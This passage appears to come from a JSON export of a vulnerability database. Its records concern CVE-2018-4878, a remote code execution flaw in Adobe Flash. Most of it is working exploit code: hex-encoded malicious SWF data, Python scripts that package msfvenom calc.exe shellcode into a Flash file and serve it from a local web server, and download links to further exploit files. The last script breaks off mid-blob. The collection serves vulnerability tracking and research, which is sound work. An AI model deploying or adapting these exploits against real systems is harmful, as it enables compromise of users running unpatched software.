F0\\x1E\\x65\\x01\\x24\\x00\\x73\\x6D\\x08\\x65\\x01\\x5D\\x4E\\x5D\\x4C\\x5D\\x57\\x66\\x57\\x46\\x4C\\x01\\x46\\x4E\\x01\\x2F\\x01\\xA8\\x74\\x6D\\x01\\x65\\x01\\x65\\x01\\x6C\\x01\\x2D\\x02\\xA1\\x74\\x6D\\x02\\x10\\x3B\\x00\\x00\\x09\\xF0\\x26\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x46\\x4E\\x01\\x2D\\x03\\xA8\\x25\\xCD\\xB4\\x01\\x14\\x0D\\x00\\x00\\xF0\\x28\\x65\\x01\\x24\\x00\\x74\\x6D\\x01\\x10\\x22\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\x65\\x01\\x65\\x01\\x6C\\x02\\x2D\\x04\\xA1\\x74\\x6D\\x02\\x65\\x01\\x6C\\x03\\x25\\x80\\x04\\x15\\xBA\\xFF\\xFF\\x65\\x01\\x6C\\x01\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x30\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x32\\x5E\\x58\\x65\\x01\\x6C\\x02\\x61\\x58\\xF0\\x33\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x24\\x3C\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x46\\x4E\\x01\\x25\\xD0\\x8A\\x01\\x14\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x36\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x84\\x01\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x04\\xF0\\x39\\x65\\x01\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x25\\x80\\x01\\xA0\\x46\\x4E\\x01\\xA0\\x74\\x6D\\x01\\x65\\x01\\x24\\x03\\x24\\x04\\xA2\\x74\\x6D\\x03\\x10\\x70\\x00\\x00\\x09\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x46\\x4E\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x24\\x0C\\x46\\x59\\x01\\x46\\x09\\x00\\x2C\\x72\\x14\\x35\\x00\\x00\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x03\\x24\\x04\\xA2\\xA1\\x46\\x4E\\x01\\x74\\x6D\\x05\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x01\\x65\\x01\\x6C\\x03\\xA0\\x24\\x04\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x06\\xF0\\x42\\x10\\x1B\\x00\\x00\\x65\\x01\\x65\\x01\\x6C\\x03\\x24\\x05\\x24\\x04\\xA2\\xA0\\x74\\x6D\\x03\\x65\\x01\\x6C\\x03\\x65\\x01\\x6C\\x04\\x15\\x84\\xFF\\xFF\\x65\\x01\\x6C\\x05\\x24\\x00\\xAB\\x76\\x2A\\x76\\x11\\x09\\x00\\x00\\x29\\x65\\x01\\x6C\\x06\\x24\\x00\\xAB\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x48\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x4A\\x65\\x01\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x02\\xA0\\x74\\x6D\\x05\\xF0\\x4B\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x10\\xE9\\x00\\x00\\x09\\xF0\\x4E\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x05\\x46\\x4E\\x01\\x74\\x6D\\x01\\x65\\x01\\x6C\\x01\\x24\\x00\\x14\\x0A\\x00\\x00\\xF0\\x51\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x73\\x14\\x38\\x00\\x00\\xF0\\x56\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\x57\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x0E\\x58\\x00\\x00\\x10\\x7E\\x00\\x00\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x74\\x13\\x04\\x00\\x00\\x10\\x31\\x00\\x00\\x5E\\x5F\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x5F\\xF0\\x63\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x17\\x2A\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\xF0\\x6B\\x65\\x01\\x65\\x01\\x6C\\x05\\x24\\x04\\xA0\\x74\\x6D\\x05\\xF0\\x4C\\x65\\x01\\x6C\\x03\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\x06\\xFF\\xFF\\x65\\x01\\x6C\\x07\\x48\\xF0\\x6F\\x10\\x17\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x71\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x24\\x00\\x48\\x01\\x46\\x84\\x06\\x8A\\x06\\x3C\\x3D\\x08\\x0D\\x00\\x01\\x01\\x00\\x0E\\x00\\x02\\x01\\x00\\x0F\\x00\\x03\\x01\\x00\\x10\\x00\\x04\\x01\\x00\\x11\\x00\\x05\\x01\\x00\\x12\\x00\\x06\\x01\\x00\\x13\\x00\\x07\\x01\\x00\\x14\\x00\\x08\\x15\\x00\\x03\\x0D\\x0D\\x04\\x05\\x86\\x03\\xD0\\x30\\x24\\x00\\x74\\x63\\x04\\x5D\\x4D\\x46\\x4D\\x00\\x29\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x63\\x05\\xF0\\x7C\\x5D\\x4E\\x5D\\x4E\\x5D\\x4E\\x62\\x05\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x14\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x46\\x4E\\x01\\x5D\\x51\\x66\\x51\\x96\\x96\\x12\\x08\\x00\\x00\\x25\\xBC\\x01\\x82\\x10\\x04\\x00\\x00\\x25\\xB0\\x01\\x82\\xA0\\x74\\x63\\x06\\xF0\\x7D\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x2D\\x04\\x15\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x7F\\x62\\x06\\x24\\x04\\xA0\\x74\\x63\\x06\\xF0\\x81\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x06\\xF0\\x82\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x07\\xF0\\x83\\x01\\x5D\\x4E\\x62\\x05\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x74\\x63\\x08\\xF0\\x84\\x01\\x5D\\x4E\\x62\\x05\\x24\\x20\\xA0\\x46\\x4E\\x01\\x74\\x63\\x09\\xF0\\x85\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x25\\x80\\x02\\x42\\x01\\x80\\x5A\\x63\\x0A\\x10\\x24\\x00\\x00\\x09\\xF0\\x88\\x01\\x62\\x0A\\x62\\x04\\x5D\\x4E\\x62\\x07\\x25\\x80\\x01\\xA1\\x62\\x04\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x53\\xF0\\x89\\x01\\x62\\x04\\x91\\x74\\x63\\x04\\xF0\\x86\\x01\\x62\\x04\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\xCC\\xFF\\xFF\\xF0\\x8B\\x01\\x62\\x0A\\x24\\x20\\x24\\x07\\xA0\\xD1\\x61\\x53\\xF0\\x8C\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\xD2\\x46\\x4F\\x02\\x29\\xF0\\x8D\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\xD3\\x46\\x4F\\x02\\x29\\xF0\\x8E\\x01\\x5D\\x4F\\x62\\x06\\x5D\\x49\\x62\\x0A\\x46\\x49\\x01\\x25\\x80\\x01\\xA0\\x46\\x4F\\x02\\x29\\xF0\\x8F\\x01\\x5D\\x3E\\x24\\x41\\x4A\\x3E\\x01\\x80\\x3E\\x63\\x0B\\xF0\\x90\\x01\\x5D\\x4D\\x66\\x4D\\x66\\x1F\\x20\\x62\\x0B\\x46\\x20\\x02\\x82\\x63\\x0C\\xF0\\x91\\x01\\x5D\\x4F\\x62\\x06\\x62\\x07\\x46\\x4F\\x02\\x29\\xF0\\x92\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\x62\\x08\\x46\\x4F\\x02\\x29\\xF0\\x93\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\x62\\x09\\x46\\x4F\\x02\\x29\\xF0\\x94\\x01\\x47\\x00\\x00\\x04\\x0C\\x03\\x05\\x0A\\x92\\x03\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x6D\\x02\\xF0\\x98\\x01\\x65\\x01\\x20\\x80\\x3E\\x6D\\x01\\xF0\\x99\\x01\\x65\\x01\\x20\\x80\\x65\\x6D\\x03\\xF0\\x9F\\x01\\x65\\x01\\x5D\\x3F\\x66\\x3F\\x82\\x6D\\x08\\xF0\\xA0\\x01\\x65\\x01\\x20\\x85\\x6D\\x09\\xF0\\xA4\\x01\\xF0\\xA4\\x01\\x65\\x01\\x56\\x00\\x80\\x3E\\x6D\\x01\\xF0\\xA5\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x24\\x00\\x61\\x44\\xF0\\xA6\\x01\\x65\\x01\\x24\\x00\\x73\\x6D\\x02\\x10\\x24\\x00\\x00\\x09\\xF0\\xA7\\x01\\x65\\x01\\x6C\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x46\\x45\\x00\\x46\\x25\\x01\\x29\\xF0\\xA6\\x01\\x65\\x01\\x65\\x01\\x6C\\x02\\x24\\x04\\xA0\\x73\\x6D\\x02\\x65\\x01\\x6C\\x02\\x5D\\x42\\x66\\x42\\x66\\x43\\x66\\x46\\x15\\xCC\\xFF\\xFF\\xF0\\xA8\\x01\\x65\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x64\\x65\\x01\\x6C\\x01\\x41\\x01\\x80\\x66\\x6D\\x03\\xF0\\xAA\\x01\\x65\\x01\\x5D\\x49\\x65\\x01\\x6C\\x03\\x46\\x49\\x01\\x74\\x6D\\x04\\xF0\\xAC\\x01\\x65\\x01\\x5D\\x64\\x46\\x64\\x00\\x74\\x6D\\x05\\xF0\\xAD\\x01\\x65\\x01\\x6C\\x05\\x24\\x00\\x13\\x04\\x00\\x00\\x10\\x0B\\x00\\x00\\xF0\\xAF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x4B\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x04\\x65\\x01\\x6C\\x03\\x66\\x46\\x24\\x04\\xA2\\x46\\x4B\\x03\\x29\\x65\\x01\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x6D\\x06\\xF0\\xB4\\x01\\x65\\x01\\x5D\\x4E\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x74\\x6D\\x06\\xF0\\xB5\\x01\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\xB6\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x04\\x46\\x4F\\x02\\x29\\xF0\\xB8\\x01\\x65\\x01\\x5D\\x4D\\x66\\x4D\\x20\\x5D\\x5F\\x66\\x5F\\x46\\x1F\\x02\\x82\\x6D\\x08\\xF0\\xBA\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x07\\x46\\x4F\\x02\\x29\\x47\\x10\\x18\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\xBF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\xC2\\x01\\x47\\x01\\x35\\xF2\\x02\\xF6\\x02\\x3C\\x3D\\x09\\x29\\x00\\x01\\x1E\\x00\\x2A\\x00\\x02\\x15\\x00\\x2B\\x00\\x03\\x1A\\x00\\x2C\\x00\\x04\\x01\\x00\\x2D\\x00\\x05\\x01\\x00\\x2E\\x00\\x06\\x01\\x00\\x2F\\x00\\x07\\x01\\x00\\x30\\x00\\x08\\x00\\x00\\x31\\x00\\x09\\x32\\x00\\x05\\x08\\x01\\x05\\x06\\x0E\\xF1\\x05\\xF0\\x0C\\xD0\\x30\\xF0\\x0E\\xD0\\x49\\x00\\xF0\\x0F\\x47\\x00\\x00\\x06\\x09\\x01\\x01\\x04\\x3D\\xD0\\x30\\x10\\x05\\x00\\x00\\x41\\x05\\x03\\x58\\x04\\xF1\\x05\\xF0\\x07\\x5D\\x36\\x5D\\x37\\x66\\x37\\x10\\x04\\x00\\x00\\x16\\x1F\\x00\\x00\\x30\\x5D\\x35\\x66\\x35\\x30\\x5D\\x35\\x66\\x35\\x58\\x00\\x1D\\x26\\x11\\x06\\x00\\x00\\x47\\x70\\x45\\x0A\\x10\\xD5\\x1D\\x68\\x34\\xF1\\x05\\xF0\\x05\\x47\\x00\\x00\\x1C\\x13\\x02\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x40\\x00\\x00\\x00\"\n\n\nprint \"[+] CVE-2018-4878 poc \"\nprint \"[x] files created\"\n\nswf = \"%s.swf\" % flash_name\n \nhtml = \"\"\"\n<!DOCTYPE html>\n<html>\n\n\"\"\" + \"<embed src=\\\"\" + swf + \"\\\"></embed>\" + \"\"\"\n</html>\n\"\"\"\n \nf = open(\"%s\" % swf, \"wb\")\nf.write(data)\nf.close()\n \nf = open(\"index.html\", \"wb\")\nf.write(html)\nf.close()\n\n\nHandlerClass = SimpleHTTPRequestHandler\nServerClass = BaseHTTPServer.HTTPServer\nProtocol = \"HTTP/1.0\"\n\n\nport = 8080\nserver_address = ('0.0.0.0', port)\n\nHandlerClass.protocol_version = Protocol\nhttpd = ServerClass(server_address, HandlerClass)\n\nsa = httpd.socket.getsockname()\nprint \"Server ready\", sa[0], \"port\", sa[1], \"...\"\nhttpd.serve_forever()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:15", "description": "\nFlash ActiveX 28.0.0.137 - Code Execution (1)", "edition": 1, "published": "2016-02-16T00:00:00", "title": "Flash ActiveX 28.0.0.137 - Code Execution (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2016-02-16T00:00:00", "id": "EXPLOITPACK:6891CF27FFF72B8EB68CEFB56D149FC3", "href": "", "sourceData": "## CVE-2018-4878 (flash exploit)\n\nPop up a calculator - tested with installation of flash activeX plugin 28.0.0.137\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44744.xlsx", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:15", "description": "\nFlash ActiveX 28.0.0.137 - Code Execution (2)", "edition": 1, "published": "2016-02-13T00:00:00", "title": "Flash ActiveX 28.0.0.137 - Code Execution (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2016-02-13T00:00:00", "id": "EXPLOITPACK:D16BF29892ADBD1FE8B1E6E0A3DED407", "href": "", "sourceData": "## CVE-2018-4878 \n\nPop up a calculator - Requires Flash ActiveX 28.0.0.137\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44745.swf", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-05-24T18:03:23", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2018-05-24T00:00:00", "title": "Flash ActiveX 28.0.0.137 - Code Execution Exploit (1)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30431", "href": "https://0day.today/exploit/description/30431", "sourceData": "## CVE-2018-4878 (flash exploit)\r\n \r\nPop up a calculator - tested with installation of flash activeX plugin 28.0.0.137\r\n \r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44744.xlsx\n\n# 0day.today [2018-05-24] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30431"}, {"lastseen": "2018-04-14T01:48:12", "description": "Adobe Flash versions 28.0.0.137 and below remote code execution proof of concept exploit.", "edition": 1, "published": "2018-04-04T00:00:00", "type": "zdt", "title": "Adobe Flash 28.0.0.137 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2018-04-04T00:00:00", "href": "https://0day.today/exploit/description/30119", "id": "1337DAY-ID-30119", "sourceData": "#!/usr/bin/env python\r\n# coding: UTF-8\r\nimport BaseHTTPServer\r\nimport sys\r\nfrom SimpleHTTPServer import SimpleHTTPRequestHandler\r\n\r\nprint \"@Syfi2k\"\r\nprint \"[+] CVE-2018-4878 poc \"\r\nprint \"--------------------------------\"\r\nprint \"Calc.exe Shellcode via Msfvenom\"\r\nprint \"Based on fixed version https://github.com/anbai-inc/CVE-2018-4878\"\r\nprint \"No Crash without executing the Shellcode, Sandbox? try it yourself\"\r\n\r\n\r\nbuf = \"\"\r\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\nbuf += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\nbuf += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\nbuf += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\nbuf += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n \r\npayload = buf\r\ndata = \"\"\r\nflash_name = \"movie\"\r\n \r\n\r\n\r\ndata = \"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\"\r\n \r\n\r\nfiller = 2940 - len(payload)\r\n \r\ndata = data + payload + \"\\x90\" * filler\r\n\r\n\r\ndata = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F